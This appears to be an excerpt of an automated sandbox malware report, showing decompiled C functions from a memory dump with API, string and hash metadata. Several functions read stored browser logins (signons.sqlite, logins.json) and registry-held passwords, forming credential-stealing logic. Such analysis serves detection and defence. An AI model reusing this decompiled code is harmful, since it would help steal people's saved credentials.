                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040A111
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040A145
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040A148
                                                                                                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040A166
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3411798969-0
                                                                                                                                                                        • Opcode ID: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                        • Instruction ID: 418605dbbba7a2bdca51e359c3d30d4779c94778b6a4b101a6c03afd9e8c1dd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                        • Instruction Fuzzy Hash: F13121716803087EFA316B709C47FD6BB95EB48B05F104829F3956A1E1CAF279909B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D7C1 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040D7C1(intOrPtr* __eax, void* __edx, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t45;
				int _t54;
				int _t60;
				char* _t63;
				void* _t65;
				void* _t67;
				void* _t72;
				char* _t73;
				void* _t82;
				int _t91;
				char* _t97;
				void* _t100;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t120;
				intOrPtr* _t121;
				void* _t125;
				char** _t126;
				char** _t127;

				_t120 = __edx;
				_t121 = __eax;
				_t45 = E00406C5E(__eax + 0x1c, __eax, __eflags, _a4);
				_t130 = _t45;
				if(_t45 == 0) {
					__eflags = 0;
					return 0;
				}
				E00404638(_t121 + 0x468);
				E00406209(_t121 + 0x158, _a4);
				_t97 = _t121 + 0x25d;
				 *_t97 = 0;
				E0040C70B(_t130, _t121 + 0x18);
				if( *_t97 == 0) {
					_t91 = strlen(_t121 + 0x158);
					 *_t126 = "signons.txt";
					_t10 = strlen(??) + 1; // 0x1
					if(_t91 + _t10 >= 0x104) {
						 *((char*)(_t121 + 0x25d)) = 0;
					} else {
						E004062B7(_t121 + 0x25d, _t121 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t127 =  &(_t126[3]);
				_t54 = strlen(_t121 + 0x158);
				 *_t127 = "signons.sqlite";
				_t18 = strlen(??) + 1; // 0x1
				if(_t54 + _t18 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _t121 + 0x158, "signons.sqlite");
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_t60 = strlen(_t121 + 0x158);
				_t127[3] = "logins.json";
				_t26 = strlen(??) + 1; // 0x1
				_pop(_t104);
				if(_t60 + _t26 >= 0x104) {
					_v532 = 0;
				} else {
					E004062B7( &_v532, _t121 + 0x158, "logins.json");
					_pop(_t104);
				}
				_t63 = _t121 + 0x25d;
				_t135 =  *_t63;
				if( *_t63 != 0) {
					_t82 = E00406C5E(_t121 + 4, _t121, _t135, _t63);
					_t136 = _t82;
					if(_t82 != 0) {
						E0040C656(_t104, _t121, _t136);
					}
				}
				_t65 = E00406155( &_v268);
				_t137 = _t65;
				_pop(_t105);
				if(_t65 != 0) {
					E0040D3B5(_t105, _t137, _t121,  &_v268);
				}
				_t67 = E00406155( &_v532);
				_t138 = _t67;
				_pop(_t106);
				if(_t67 != 0) {
					E0040D003(_t106, _t120, _t138, _t121,  &_v532);
				}
				_t100 = 0;
				if( *((intOrPtr*)(_t121 + 0x474)) <= 0) {
					L24:
					return 1;
				} else {
					do {
						_t125 = E0040DA96(_t100, _t121 + 0x468);
						_t38 = _t125 + 0x504; // 0x504
						_t72 = _t38;
						_push("none");
						_push(_t72);
						L00412072();
						if(_t72 != 0) {
							_t39 = _t125 + 4; // 0x4
							_t73 = _t39;
							if( *_t73 == 0) {
								_t40 = _t125 + 0x204; // 0x204
								strcpy(_t73, _t40);
							}
							 *((intOrPtr*)( *_t121 + 4))(_t125);
						}
						_t100 = _t100 + 1;
					} while (_t100 <  *((intOrPtr*)(_t121 + 0x474)));
					goto L24;
				}
			}





























                                                                                                                                                                        0x0040d7c1
                                                                                                                                                                        0x0040d7d0
                                                                                                                                                                        0x0040d7d5
                                                                                                                                                                        0x0040d7da
                                                                                                                                                                        0x0040d7dc
                                                                                                                                                                        0x0040d9cf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d9cf
                                                                                                                                                                        0x0040d7e8
                                                                                                                                                                        0x0040d7f6
                                                                                                                                                                        0x0040d7ff
                                                                                                                                                                        0x0040d806
                                                                                                                                                                        0x0040d809
                                                                                                                                                                        0x0040d816
                                                                                                                                                                        0x0040d81f
                                                                                                                                                                        0x0040d826
                                                                                                                                                                        0x0040d832
                                                                                                                                                                        0x0040d839
                                                                                                                                                                        0x0040d856
                                                                                                                                                                        0x0040d83b
                                                                                                                                                                        0x0040d84d
                                                                                                                                                                        0x0040d853
                                                                                                                                                                        0x0040d839
                                                                                                                                                                        0x0040d867
                                                                                                                                                                        0x0040d86e
                                                                                                                                                                        0x0040d879
                                                                                                                                                                        0x0040d87d
                                                                                                                                                                        0x0040d884
                                                                                                                                                                        0x0040d890
                                                                                                                                                                        0x0040d897
                                                                                                                                                                        0x0040d8b4
                                                                                                                                                                        0x0040d899
                                                                                                                                                                        0x0040d8ab
                                                                                                                                                                        0x0040d8b1
                                                                                                                                                                        0x0040d8c5
                                                                                                                                                                        0x0040d8cc
                                                                                                                                                                        0x0040d8db
                                                                                                                                                                        0x0040d8e2
                                                                                                                                                                        0x0040d8ee
                                                                                                                                                                        0x0040d8f4
                                                                                                                                                                        0x0040d8f5
                                                                                                                                                                        0x0040d912
                                                                                                                                                                        0x0040d8f7
                                                                                                                                                                        0x0040d909
                                                                                                                                                                        0x0040d90f
                                                                                                                                                                        0x0040d90f
                                                                                                                                                                        0x0040d919
                                                                                                                                                                        0x0040d91f
                                                                                                                                                                        0x0040d922
                                                                                                                                                                        0x0040d928
                                                                                                                                                                        0x0040d92d
                                                                                                                                                                        0x0040d92f
                                                                                                                                                                        0x0040d931
                                                                                                                                                                        0x0040d931
                                                                                                                                                                        0x0040d92f
                                                                                                                                                                        0x0040d93d
                                                                                                                                                                        0x0040d942
                                                                                                                                                                        0x0040d944
                                                                                                                                                                        0x0040d945
                                                                                                                                                                        0x0040d94f
                                                                                                                                                                        0x0040d94f
                                                                                                                                                                        0x0040d95b
                                                                                                                                                                        0x0040d960
                                                                                                                                                                        0x0040d962
                                                                                                                                                                        0x0040d963
                                                                                                                                                                        0x0040d96d
                                                                                                                                                                        0x0040d96d
                                                                                                                                                                        0x0040d972
                                                                                                                                                                        0x0040d97a
                                                                                                                                                                        0x0040d9ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d97c
                                                                                                                                                                        0x0040d97c
                                                                                                                                                                        0x0040d989
                                                                                                                                                                        0x0040d98b
                                                                                                                                                                        0x0040d98b
                                                                                                                                                                        0x0040d991
                                                                                                                                                                        0x0040d996
                                                                                                                                                                        0x0040d997
                                                                                                                                                                        0x0040d9a0
                                                                                                                                                                        0x0040d9a2
                                                                                                                                                                        0x0040d9a2
                                                                                                                                                                        0x0040d9a8
                                                                                                                                                                        0x0040d9aa
                                                                                                                                                                        0x0040d9b2
                                                                                                                                                                        0x0040d9b8
                                                                                                                                                                        0x0040d9be
                                                                                                                                                                        0x0040d9be
                                                                                                                                                                        0x0040d9c1
                                                                                                                                                                        0x0040d9c2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040d97c

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
                                                                                                                                                                          • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
                                                                                                                                                                          • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
                                                                                                                                                                          • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
                                                                                                                                                                          • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
                                                                                                                                                                          • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
                                                                                                                                                                          • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
                                                                                                                                                                          • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
                                                                                                                                                                          • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
                                                                                                                                                                          • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D81F
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D82D
                                                                                                                                                                        • memset.MSVCRT ref: 0040D86E
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D87D
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D88B
                                                                                                                                                                        • memset.MSVCRT ref: 0040D8CC
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D8DB
                                                                                                                                                                        • strlen.MSVCRT ref: 0040D8E9
                                                                                                                                                                        • _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
                                                                                                                                                                        • strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
                                                                                                                                                                          • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                          • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                        • API String ID: 1405107918-3138536805
                                                                                                                                                                        • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                        • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                                                                                                                                                                        • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                        • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BA21 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                        			E0040BA21(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L00412072();
				if(__eax != 0) {
					_push("/sverhtml");
					L00412072();
					if(__eax != 0) {
						_push("/sxml");
						L00412072();
						if(__eax != 0) {
							_push("/stab");
							L00412072();
							if(__eax != 0) {
								_push("/scomma");
								L00412072();
								if(__eax != 0) {
									_push("/stabular");
									L00412072();
									if(__eax != 0) {
										_push("/skeepass");
										L0041207E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                                                                                                                        0x0040ba22
                                                                                                                                                                        0x0040ba27
                                                                                                                                                                        0x0040ba30
                                                                                                                                                                        0x0040ba37
                                                                                                                                                                        0x0040ba3c
                                                                                                                                                                        0x0040ba45
                                                                                                                                                                        0x0040ba4c
                                                                                                                                                                        0x0040ba51
                                                                                                                                                                        0x0040ba5a
                                                                                                                                                                        0x0040ba61
                                                                                                                                                                        0x0040ba66
                                                                                                                                                                        0x0040ba6f
                                                                                                                                                                        0x0040ba76
                                                                                                                                                                        0x0040ba7b
                                                                                                                                                                        0x0040ba84
                                                                                                                                                                        0x0040ba8b
                                                                                                                                                                        0x0040ba90
                                                                                                                                                                        0x0040ba99
                                                                                                                                                                        0x0040baa0
                                                                                                                                                                        0x0040baa5
                                                                                                                                                                        0x0040baac
                                                                                                                                                                        0x0040bab6
                                                                                                                                                                        0x0040ba9b
                                                                                                                                                                        0x0040ba9d
                                                                                                                                                                        0x0040ba9e
                                                                                                                                                                        0x0040ba9e
                                                                                                                                                                        0x0040ba86
                                                                                                                                                                        0x0040ba88
                                                                                                                                                                        0x0040ba89
                                                                                                                                                                        0x0040ba89
                                                                                                                                                                        0x0040ba71
                                                                                                                                                                        0x0040ba73
                                                                                                                                                                        0x0040ba74
                                                                                                                                                                        0x0040ba74
                                                                                                                                                                        0x0040ba5c
                                                                                                                                                                        0x0040ba5e
                                                                                                                                                                        0x0040ba5f
                                                                                                                                                                        0x0040ba5f
                                                                                                                                                                        0x0040ba47
                                                                                                                                                                        0x0040ba49
                                                                                                                                                                        0x0040ba4a
                                                                                                                                                                        0x0040ba4a
                                                                                                                                                                        0x0040ba32
                                                                                                                                                                        0x0040ba34
                                                                                                                                                                        0x0040ba35
                                                                                                                                                                        0x0040ba35

                                                                                                                                                                        APIs
                                                                                                                                                                        • _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
                                                                                                                                                                        • _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp
                                                                                                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                        • API String ID: 2884411883-1959339147
                                                                                                                                                                        • Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                                                                                                                                                                        • Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
                                                                                                                                                                        • Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F8B4 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E0040F8B4(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F6E2(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F6E2(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405F07(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405F07(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                                                                                                                        0x0040f8cf
                                                                                                                                                                        0x0040f8d5
                                                                                                                                                                        0x0040f8e3
                                                                                                                                                                        0x0040f8e9
                                                                                                                                                                        0x0040f8f7
                                                                                                                                                                        0x0040f8fd
                                                                                                                                                                        0x0040f902
                                                                                                                                                                        0x0040f909
                                                                                                                                                                        0x0040f927
                                                                                                                                                                        0x0040f92c
                                                                                                                                                                        0x0040f92c
                                                                                                                                                                        0x0040f933
                                                                                                                                                                        0x0040f951
                                                                                                                                                                        0x0040f962
                                                                                                                                                                        0x0040f967
                                                                                                                                                                        0x0040f967
                                                                                                                                                                        0x0040f97d
                                                                                                                                                                        0x0040f98c
                                                                                                                                                                        0x0040f991
                                                                                                                                                                        0x0040f994
                                                                                                                                                                        0x0040f999
                                                                                                                                                                        0x0040f9a3
                                                                                                                                                                        0x0040f9a6
                                                                                                                                                                        0x0040f9a9
                                                                                                                                                                        0x0040f9b2
                                                                                                                                                                        0x0040f9b8
                                                                                                                                                                        0x0040f9bd
                                                                                                                                                                        0x0040f9bf
                                                                                                                                                                        0x0040f9c4
                                                                                                                                                                        0x0040f9dd
                                                                                                                                                                        0x0040f9c6
                                                                                                                                                                        0x0040f9d3
                                                                                                                                                                        0x0040f9d8
                                                                                                                                                                        0x0040f9d8
                                                                                                                                                                        0x0040fa07
                                                                                                                                                                        0x0040fa16
                                                                                                                                                                        0x0040fa1b
                                                                                                                                                                        0x0040fa1e
                                                                                                                                                                        0x0040fa21
                                                                                                                                                                        0x0040fa21
                                                                                                                                                                        0x0040fa21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fa26
                                                                                                                                                                        0x0040fa2a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sprintf$memset$strcpy
                                                                                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                        • API String ID: 898937289-3842416460
                                                                                                                                                                        • Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                        • Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                        • Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040DD59 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 118registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040DD59(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E00412360(0x132c, __ecx);
				_t1 =  &_a16; // 0x40e170
				_t84 = 0;
				_t2 =  &_a16; // 0x40e170
				_t46 = RegOpenKeyExA( *_t2, "Creds", 0, 0x20019, _t1);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E0040481B(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060DA(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                                                                                                                        0x0040dd61
                                                                                                                                                                        0x0040dd6f
                                                                                                                                                                        0x0040dd78
                                                                                                                                                                        0x0040dd80
                                                                                                                                                                        0x0040dd83
                                                                                                                                                                        0x0040dd87
                                                                                                                                                                        0x0040dec0
                                                                                                                                                                        0x0040dec0
                                                                                                                                                                        0x0040dd93
                                                                                                                                                                        0x0040dda1
                                                                                                                                                                        0x0040dda9
                                                                                                                                                                        0x0040ddb0
                                                                                                                                                                        0x0040ddb1
                                                                                                                                                                        0x0040ddb4
                                                                                                                                                                        0x0040dea2
                                                                                                                                                                        0x0040ddd2
                                                                                                                                                                        0x0040ddf0
                                                                                                                                                                        0x0040ddff
                                                                                                                                                                        0x0040de08
                                                                                                                                                                        0x0040de11
                                                                                                                                                                        0x0040de17
                                                                                                                                                                        0x0040de1d
                                                                                                                                                                        0x0040de39
                                                                                                                                                                        0x0040de42
                                                                                                                                                                        0x0040de48
                                                                                                                                                                        0x0040de4f
                                                                                                                                                                        0x0040de56
                                                                                                                                                                        0x0040de70
                                                                                                                                                                        0x0040de7e
                                                                                                                                                                        0x0040de83
                                                                                                                                                                        0x0040de89
                                                                                                                                                                        0x0040de89
                                                                                                                                                                        0x0040de39
                                                                                                                                                                        0x0040de8e
                                                                                                                                                                        0x0040de8e
                                                                                                                                                                        0x0040de94
                                                                                                                                                                        0x0040de97
                                                                                                                                                                        0x0040de9e
                                                                                                                                                                        0x0040de9f
                                                                                                                                                                        0x0040de9f
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                                                                                                                                                                        • memset.MSVCRT ref: 0040DDA1
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
                                                                                                                                                                        • LocalFree.KERNEL32(00000001), ref: 0040DE83
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040DE8E
                                                                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
                                                                                                                                                                        • API String ID: 551151806-2386532916
                                                                                                                                                                        • Opcode ID: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                                                                                                                                                                        • Instruction ID: 9b96f835ed6997495325440ed53231f0f0ace883948e60a6f3a7b66043991938
                                                                                                                                                                        • Opcode Fuzzy Hash: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                                                                                                                                                                        • Instruction Fuzzy Hash: 61410676900219AFDB11DFA5DC84EEFBBBCEB48755F0040A6F905E2150DA34AB948B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E74B Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040E74B() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x418518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x417fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x417fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x417fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41810c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x417fe8 = _t2;
									if(_t2 != 0) {
										 *0x418518 = 1;
									}
								}
							}
						}
					}
					if( *0x418518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                                                                                                        0x0040e752
                                                                                                                                                                        0x0040e7e2
                                                                                                                                                                        0x0040e7e2
                                                                                                                                                                        0x0040e75e
                                                                                                                                                                        0x0040e764
                                                                                                                                                                        0x0040e768
                                                                                                                                                                        0x0040e7e1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e76a
                                                                                                                                                                        0x0040e777
                                                                                                                                                                        0x0040e77b
                                                                                                                                                                        0x0040e780
                                                                                                                                                                        0x0040e788
                                                                                                                                                                        0x0040e78c
                                                                                                                                                                        0x0040e791
                                                                                                                                                                        0x0040e799
                                                                                                                                                                        0x0040e79d
